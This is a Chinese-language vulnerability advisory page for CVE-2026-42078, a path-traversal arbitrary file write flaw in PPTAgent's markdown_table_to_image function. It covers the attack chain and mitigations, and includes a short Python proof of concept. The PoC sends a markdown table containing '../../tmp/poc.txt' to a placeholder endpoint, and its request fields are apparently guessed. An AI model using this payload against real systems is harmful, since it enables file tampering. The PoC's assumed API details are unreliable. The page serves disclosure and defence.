CVE-2026-42078 CVSS 4.6 中危

CVE-2026-42078 PPTAgent任意文件写入漏洞

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42078

漏洞类型

任意文件写入

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

PPTAgent

漏洞概述

PPTAgent是一个用于生成PowerPoint的代理框架。在commit 418491a之前，该框架存在安全漏洞，攻击者可利用`markdown_table_to_image`组件实现任意文件写入和目录创建。此漏洞可能导致系统数据被篡改或可用性受损，官方已通过特定提交修复此问题。

技术细节

该漏洞的根本原因在于PPTAgent中的`markdown_table_to_image`函数未对用户提供的输入进行充分的路径校验。当处理包含特殊字符或路径遍历序列（如`../`）的Markdown表格数据时，程序可能会错误地将其解析为文件系统路径。由于代码直接使用了未经净化的输入来构造文件名或目录名，攻击者可以通过精心构造的输入数据，在服务器文件系统的任意位置写入恶意文件或创建新目录。虽然CVSS评分显示需要用户交互（UI:R），意味着攻击可能需要诱导用户处理特定的恶意文件，但一旦触发，即可覆盖关键配置文件或写入Webshell，从而对系统造成进一步的安全威胁。

攻击链分析

STEP 1

侦察

攻击者识别运行易受攻击版本的PPTAgent实例（commit 418491a之前）。

STEP 2

构造载荷

攻击者创建包含路径遍历序列（如`../`）的恶意Markdown表格内容。

STEP 3

投递载荷

攻击者诱导拥有低权限的用户（PR:L）在PPTAgent中输入或上传该恶意内容。

STEP 4

触发漏洞

PPTAgent处理该内容并调用`markdown_table_to_image`函数，由于未过滤路径，执行任意文件写入。

STEP 5

达成效果

攻击者在系统预期的目录之外成功写入文件或创建目录，影响完整性（I:L）和可用性（A:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# This is a conceptual PoC for CVE-2026-42078
# Target: PPTAgent prior to commit 418491a
# Vulnerability: Arbitrary file write via markdown_table_to_image

target_url = "http://target-pptagent/api/generate"
# Malicious payload attempting to write to a file outside the webroot
# Using path traversal sequences in the table data
markdown_payload = """
| Column 1 | Column 2 |
| --- | --- |
| ../../tmp/poc.txt | malicious_content |
"""

data = {
    "content": markdown_payload,
    "format": "markdown_table_to_image" # Triggering the vulnerable function
}

try:
    response = requests.post(target_url, json=data)
    if response.status_code == 200:
        print("Payload sent successfully. Check if file was written.")
    else:
        print("Failed to send payload.")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

PPTAgent < commit 418491a

防御指南

临时缓解措施

建议立即检查当前PPTAgent的版本，如果未包含commit 418491a，请暂停使用涉及`markdown_table_to_image`的功能，直至完成升级。同时，可以在应用层面对输入的Markdown内容进行正则匹配，禁止包含`../`等路径跳转字符的内容进入处理流程。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表